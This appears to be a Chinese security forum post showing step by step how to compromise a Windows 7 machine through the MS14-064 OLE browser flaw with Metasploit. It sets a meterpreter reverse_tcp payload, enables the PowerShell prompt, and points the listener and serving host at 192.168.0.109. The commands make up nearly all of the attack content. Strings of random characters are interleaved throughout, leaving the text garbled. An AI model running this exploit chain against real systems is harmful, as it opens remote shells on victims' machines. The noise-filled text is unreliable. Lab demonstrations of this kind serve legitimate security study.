找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1436|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: P8 O. f" X0 T+ s. e 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 " Z2 m2 F1 \: Z# q+ W

: f5 O! S# f2 Q% g* B9 S

) K/ X: T- E# e. t 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ]5 L& m4 [$ h* ?4 O H

6 i) `5 m2 k; |8 {6 q* F+ w

) Z; v' |0 I; q2 v7 |3 N8 M! d) Z% B 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp% H! l* k- Z- h& X5 c5 K

0 D! Q" C ?/ |- i

5 h* W% r7 h% \7 A             set AllowPowershellPrompt true6 Q8 u* I( t% T8 r' {* u

* i& ]# M1 W( b5 f1 e# J6 Y

) h% t' L0 B( z* c( d& P             Set LHOST 192.168.0.109 / s9 b0 u0 ?5 K/ q5 o0 O+ h. W

W5 A8 R: c- ?

9 W3 s- c; J; ?7 \             set SRVHOST 192.168.0.109 5 @& [3 b# y; n& X

3 @% R& `+ J2 {/ A/ F) R6 \6 i5 a9 ~

" N+ C( } @* K' H5 X) _1 I             Set uripath share5 m0 p1 d- a7 _1 d2 q2 h3 Y

3 P2 O. T& R$ u/ h; L7 B) T+ T& m( X

& s# k, m C* R! a7 s             Set srvport 803 j/ ]0 j7 U) O$ U; i/ s

) C6 L. E) k8 K$ O

: {/ q4 O3 t4 J2 q! V C( F% p   1 E6 s& P3 U. Z7 Z( Z

8 ^2 M. x7 M1 } t9 v- ~

) g% f2 m# }+ S6 R1 ^4 U   9 N% t+ j" s, \; Y1 R

( |/ }8 Y/ q/ s

4 K, ~; \' o. Q% P  ; W4 X" H. g3 u9 S9 o2 b& O. [' f

1 S/ p' V$ ?/ E0 |" g/ \& e

( g1 i% x' y8 q8 f  4 d% S8 Z$ N5 W0 P) f/ X5 i

% Q2 j' b" w# i4 W" x8 i ?

2 t7 H: g- B( m6 l) e3 _2 K2 f  + x' X9 G. A3 a6 j# h6 f. ~) Z' c* {' Z

( ?6 Z) v5 t+ \1 d7 i

5 u% ?% y3 h) [2 e/ ]; z6 @ 下面我们来访问本地地址如图:' t. _4 V8 |$ S$ R0 z, m# @

* h1 Z! h: |9 M! T8 F8 D* V8 d

% ]: T( L% s9 K  0 u4 d+ b+ w5 b' `

# \& I: B, z/ O

; j& f$ L. O. x6 S, h( g* e) p   Z# w; V" |, B2 v9 c

d' m8 ~2 U) ]% U9 e* k6 @

* N/ \5 w: P. n9 H7 Z# g( X " j0 U7 f( H# m# ~

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表